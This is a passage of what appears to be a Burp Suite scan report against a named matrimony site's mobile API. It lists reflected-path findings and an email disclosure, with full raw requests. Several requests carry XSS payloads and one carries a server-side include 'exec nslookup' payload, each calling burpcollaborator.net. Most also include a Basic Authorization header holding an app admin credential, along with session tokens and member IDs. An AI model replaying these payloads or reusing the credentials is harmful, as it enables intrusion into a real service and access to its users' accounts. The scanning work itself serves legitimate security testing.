Date: Tue, 19 May 2020 17:09:22 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/getDeviceInfo.php/javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/[*/[]/
+((new(Image)).src=([]+/\/0kld6kqse4jv233xft35spevamge72ztnnaey3\.burpcollaborator.net/).replace(/\\/g,[]))//'> was not found
on this server.</p>
...[SNIP]...
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/loginwithdet.php8t3f64t875 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNT
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:25:39 GMT
Connection: close
5.22. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response .
Request
GET /applogin/loginwithdet.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f6z6jlq5ytay1h9i3uzib7vt1psvkn8fy3sqje8%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:09:27 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL
/applogin/loginwithdet.php/'"><svg/onload=(new(Image)).src='//6z6jlq5ytay1h9i3uzib7vt1psvkn8fy3sqje8\56burpcollabo
rator.net'> was not found on this server.</p>
...[SNIP]...
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/logout.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/i54fkzlfj5 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 159
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:08:48 GMT
Connection: close
5.24. https://apps.bharatmatrimony.com/applogin/logout.php [name of an
arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/logout.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /applogin/logout.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f9kum6tq1edj42c36f23esye4avgx4pudo0go5%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 159
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:13:02 GMT
Connection: close
5.25. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [URL
path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appmemberhome/memstats.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appmemberhome/ylu1gn7umd HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 170
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 222
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:00:45 GMT
Connection: close
5.26. https://apps.bharatmatrimony.com/appmemberhome/memstats.php
[name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appmemberhome/memstats.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appmemberhome/memstats.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fob31x8hg5sajtrul6hutjd5j1a7ev6lufh75w%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 170
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:04:20 GMT
Connection: close
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephoto.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appphoto/enlargephoto.phpf68bdjilf8 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 255
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=%26APPVERSION%3D4.6&APPVERSIONCODE=%26APPVERSIONCODE
%3D192&ENCID=82518c062044e155fce5b3980c0e28c60&ENTRYTYPE=M&ID=M6651646&LOGINGEN=M&OUTPUTTYPE=2&SDBMAT
RID=M6651646&TOKENID=131
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:58:44 GMT
Connection: close
5.28. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephoto.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appphoto/enlargephoto.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fzorcajuri3nu627wjs74woiuelkq8iy6stkh9%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 255
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=%26APPVERSION%3D4.6&APPVERSIONCODE=%26APPVERSIONCODE
%3D192&ENCID=82518c062044e155fce5b3980c0e28c60&ENTRYTYPE=M&ID=M6651646&LOGINGEN=M&OUTPUTTYPE=2&SDBMAT
RID=M6651646&TOKENID=131
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 335
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:04:11 GMT
Connection: close
5.29. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php
[URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephotodisplay.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appphoto/enlargephotodisplay.php3idgo4qx24 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 195
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=82518c062044e155fce5b3980c0e28c60&ID=M6651646&OUTPUT
TYPE=2&PHOTOPWD=PHOTOPWD&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&VIEWEDID=M6651646
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:51:30 GMT
Connection: close
5.30. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php
[name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appphoto/enlargephotodisplay.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appphoto/enlargephotodisplay.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f6krj6qqyeaj12933fz3bsve1asgj67yxmr9jx8%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 195
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=82518c062044e155fce5b3980c0e28c60&ID=M6651646&OUTPUT
TYPE=2&PHOTOPWD=PHOTOPWD&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&VIEWEDID=M6651646
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 343
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:05:07 GMT
Connection: close
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appcurltrack.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appsearch/%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%22z9y%22%20value%3d%22y8xbuieq22%22--%3e%3c!--
%23set%20var%3d%221b0%22%20value%3d%220azdwkgs44%22--%3e%3c!--%23echo%20var%3d%22z9y%22--%3e%3c!--%23echo
%20var%3d%221b0%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname
%20lvkyh51dppugdoeiqeeq3apgl7ryimakybqygm5.burpcollaborator.net%22%20--%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 51
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=®data=
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 556
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:34:38 GMT
Connection: close
5.32. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appcurltrack.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appsearch/appcurltrack.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2ftsp6edylmxroawbqnmby0imoifo6fu7lvfi76w
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 51
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=®data=
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:41:47 GMT
Connection: close
5.33. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
[URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
GET /appsearch/appwhoviewedprofile.phpmn53oagde5?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fce5b3980c0e28c60&TOK
ENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&STLIMIT=0&RECCNT=20 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:13:49 GMT
Connection: close
5.34. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
[name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appsearch/appwhoviewedprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fvwv8if2nqzvqeyfsrof04kqqmhs9rxjn7hu8ix%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 344
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:11:58 GMT
Connection: close
5.35. https://apps.bharatmatrimony.com/appsuccess/successstory.php [URL
path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsuccess/successstory.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appsuccess/d0ktzpdvxq HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 215
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CASTE=1017&DOS=23&ENCID=cec3bc261ddb6cd658084cb7d672bf3f6&I
D=M6651646&LOGINENTRY=F&OUTPUTTYPE=2&RECORDCOUNT=20&STLIMIT=0&TOKENID=131c6f8396a2071562a9b7c10
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 219
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:09:25 GMT
Connection: close
5.36. https://apps.bharatmatrimony.com/appsuccess/successstory.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appsuccess/successstory.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appsuccess/successstory.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fsa65wcgk4w9nsvtp5ltxih4n0e650tsjgd35ru%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 215
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CASTE=1017&DOS=23&ENCID=cec3bc261ddb6cd658084cb7d672bf3f6&I
D=M6651646&LOGINENTRY=F&OUTPUTTYPE=2&RECORDCOUNT=20&STLIMIT=0&TOKENID=131c6f8396a2071562a9b7c10
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:10:51 GMT
Connection: close
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/appinboxui.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appunified/appinboxui.phpenkvry4ekx HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 255
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=118&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FILTERTYPE=1&ID=M665
1646&LISTTYPE=1&NOOFREC=20&OUTPUTTYPE=2&PROFILEHIGHLIGHTS=2&READTYPE=23~24&START=0&TABTYPE=16&
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:35:46 GMT
Connection: close
5.38. https://apps.bharatmatrimony.com/appunified/appinboxui.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/appinboxui.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appunified/appinboxui.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fxdeazhjp71csv0wu8qw2lm7s3j9baz2pqjda1z%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:12:58 GMT
Connection: close
5.39. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [URL
path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/viewcalldetails.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appunified/viewcalldetails.phpyj5dbps38m HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 199
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID=M6651646&LOGINGE
N=M&NOOFREC=20&OUTPUTTYPE=2&REQTYPE=1&START=0&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:16:35 GMT
Connection: close
5.40. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [name
of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appunified/viewcalldetails.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /appunified/viewcalldetails.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b
%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c
%2fknbx94tchomf5n6hid6pv9hfd6jylmdd17oycn%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 420
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 17:13:44 GMT
Connection: close
· /applogin/loginwithdet.php
· /appmemberhome/memstats.php
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email
addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary
third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source)
may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the
application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or
excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox
addresses (such as helpdesk@example.com).
To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead
providing a form that generates the email server-side, protected by a CAPTCHA if necessary.
Vulnerability classifications
· CWE-200: Information Exposure
6.1. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The following email address was disclosed in the response:
· bmtesting34@gmail.com
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNT
...[SNIP]...
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6278
Content-Type: application/json
Date: Tue, 19 May 2020 12:24:06 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 17:54:04","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
0"},"GENDER":"M","PROFILECREATEDFOR":"1","MOTHERTONGUE":"47","GOTHRAID":"0","CASTE":"1017","POWERPACKSTATUS":"2",
"MEMBERTYPE":"F","SENTACCESS":"N","MEMBERSHIPNAME":"","MEMBERSTATUS":"0","MEMBEREMAIL":"bmtesting34@gmail.com
","DAYSOFREGISTRATION":"232","VALIDDAYS":"0","EXPIRYDATE":"2020-05-08
12:22:59","NUMBEROFPAYMENTS":"2","AUTORENEWALSTATUS":"0","POSTFLAG":"0","PROFILECOMPVAL":"79","ENABLEDISCOVER":
"1","DSSIMAGE":"","D
...[SNIP]...
6.2. https://apps.bharatmatrimony.com/appmemberhome/memstats.php
Previous
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appmemberhome/memstats.php
Issue detail
The following email address was disclosed in the response:
· bmtesting34@gmail.com
Request
POST /appmemberhome/memstats.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 170
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 3276
Content-Type: application/json
Date: Tue, 19 May 2020 15:43:14 GMT
Connection: close
Vary: Accept-Encoding
